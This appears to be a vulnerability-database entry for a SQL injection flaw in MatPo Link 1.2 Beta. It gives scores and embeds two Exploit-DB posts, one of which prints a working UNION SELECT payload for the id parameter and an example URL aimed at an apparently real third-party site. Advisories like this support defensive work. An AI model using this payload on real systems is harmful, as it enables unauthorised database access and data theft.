CVE-2008-6606
published 2009-04-06CVE-2008-6606: SQL injection vulnerability in view.php in MatPo Link 1.2 Beta allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
SQL injection vulnerability in view.php in MatPo Link 1.2 Beta allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| matpo | matpo_link | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting
exploitdb·2008-11-03
CVE-2008-6607 MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting
MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting
---
###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/ EgY Coders Vulnerability Research TM
# [~] Discovered by : Hakxer
# [~] Type Gap : Blind Sql inj / XSS
# [~] Script :MatPo Link 1.2b
# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk
##########################################################################
|| Blind Sql Inj ||
POC: http://hilfe-forum.pytalhost
Exploit-DB
MatPo Link 1.2b - SQL Injection
exploitdb·2008-11-03
CVE-2008-6606 MatPo Link 1.2b - SQL Injection
MatPo Link 1.2b - SQL Injection
---
[~] MatPo Link Version 1.2 Beta Remote Sql inj.
[~]
[~] view.php (id)
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------
Exploit:
http://localhost/script_path/view.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
example:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
[~]---------------------------
No writeups or analysis indexed.
2009-04-06
Published